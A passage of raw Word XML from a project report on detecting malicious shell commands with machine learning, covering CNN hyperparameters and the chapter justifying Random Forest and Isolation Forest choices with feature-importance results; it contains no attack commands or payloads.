          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Adam, lr = 1e-3, weight_decay = 1e-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>learning_rate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is by far the CNN's most sensitive knob (Ch. 7: F1 0.713 → 0.851 across the range); 1e-3 is a safe converging default, with 3e-3 the sweep optimum to adopt only after full-data confirmation. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>weight_decay=1e-4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> adds mild L2 regularization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>epochs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>batch_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8 / 256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8 epochs is sufficient given the small character vocabulary and short sequences (Ch. 7's curves are already converged by then); batch 256 keeps training fast on CPU.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Covers the p99 command length (Dataset 1 p99 ≈ 227 chars) while truncating pathological outliers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The through-line: XGBoost's hyperparameters are tuned for a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>stable, low-FPR operating point</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on interpretable features, while the CNN's are tuned for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>convergence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of a multi-scale character representation — and Ch. 7's sensitivity analysis is what justifies each specific value rather than a default guess.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 6 — Model Selection Justification (Random Forest &amp; Isolation Forest)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Companion to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch6_model_justification.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (XGBoost / 1D-CNN, Ben). Section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>numbers continue his: §6.1–6.3 are his two models, §6.4–6.6 below are the two</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>models Noam owns. Every hyperparameter quoted here is the production value in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>; every sensitivity claim is proved in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch7_rf_if_sensitivity_findings.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> — **Chapter 6 states the choice,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Chapter 7 proves it.** The one exception is the Isolation Forest sub-sample</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>result in §6.6, which was run for this chapter and is reproducible via</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>analysis/ch6_if_subsample_probe.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch6_if_subsample_probe.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Holdout metrics are read from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/summary.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (43-feature set).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The four-model portfolio is chosen to span </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>three learning paradigms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>than three tunings of the same idea: boosting (XGBoost), representation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>learning (1D-CNN), bagging (Random Forest), and unsupervised anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(Isolation Forest). The last of those is the important one — Random Forest and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XGBoost disagree about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to combine trees, but Isolation Forest disagrees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">about what the problem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t>. It never sees an attack label, so it cannot fail in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the way the whole supervised stack shares: it cannot memorise the style of our</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attack corpus. That is what makes it worth carrying despite the weakest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>standalone numbers in the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Random Forest on engineered features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Random Forest is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bagging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> counterpart to Ben's boosted trees: many deep,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>decorrelated trees fitted on bootstrap samples with a random feature subset at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>each split, averaged. Its case on this task rests on four properties, three of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>which we could check rather than assert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Breiman, L. (2001), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Random Forests</w:t>
      </w:r>
      <w:r>
        <w:t>, Machine Learning 45(1):5–32,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>doi:10.1023/A:1010933404324 — the bootstrap-plus-random-subspace construction and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> decorrelation argument used below. Alasmary, H., Anwar, A.,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Abusnaina, A., Alabduljabbar, A., Abuhamad, M., Wang, A., Nyang, D., Awad, A. &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mohaisen, D. (2022), *ShellCore: Automating Malicious IoT Software Detection Using</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Shell Commands Representation*, IEEE Internet of Things Journal 9(4):2485–2496,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>doi:10.1109/JIOT.2021.3086398 (preprint arXiv:2103.14221) — direct precedent for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Random Forest on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>shell commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> specifically, and the paper Chapter 2 takes as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>our closest comparator. Their Table 4 reports RF at 99.78% accuracy / 99.78 F-1 /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.19 FPR for character-level command detection, i.e. essentially at ceiling. We</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>read that as corroborating Chapter 3 and Chapter 8 rather than as a target to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>chase: their own ablation shows the same RF falling to 84.96 F-1 (term-level) when</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the vector space is rebuilt from malware commands alone, which is the same lesson</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>our cross-dataset transfer collapse teaches — on curated command corpora the score</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is a property of the representation and the corpus at least as much as of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>classifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**It is robust to the heavy tails Chapter 3 documented, because trees never</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>extrapolate.** The engineered features are severely right-skewed: on Dataset 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">attack commands carry 2.5× the benign variance in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2055 vs 822) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3× in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b64_run_len</w:t>
      </w:r>
      <w:r>
        <w:t>, driven by a small number of enormous encoded payloads. A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>linear or distance-based model has to be defended against those points because</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>its output is unbounded in the feature value; an axis-aligned tree simply routes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a 5,000-character payload into the same terminal leaf as a 300-character one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Outliers change which leaf a sample lands in, never how far the prediction is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>dragged. Bootstrap aggregation then averages away the residual variance that a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>single deep tree would inherit from those tails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>It is auditable, and its audit independently corroborates Chapter 3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>importance over the fitted production forest gives, on Dataset 1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.134, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.117, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.085,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.073, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.072, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.063,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.057, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_pipes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.051. Compare that with the model-free</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">rank-biserial ranking computed in Chapter 3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.452),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.318), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.303), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.247),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.238). The top two agree in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>both identity and order</w:t>
      </w:r>
      <w:r>
        <w:t>, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>they were derived by completely independent routes: one a Mann-Whitney U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>statistic on single features, the other a multivariate impurity accounting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>inside a fitted ensemble. A security detector whose learned attention matches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the univariate evidence is one an analyst can be asked to trust.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**The importance mass is spread, which is evidence against a structural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shortcut.** All 43 features are used (non-zero importance) and the top eight</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>account for only 65% (Dataset 1) and 64% (Dataset 2) of total importance. This</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>matters because</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
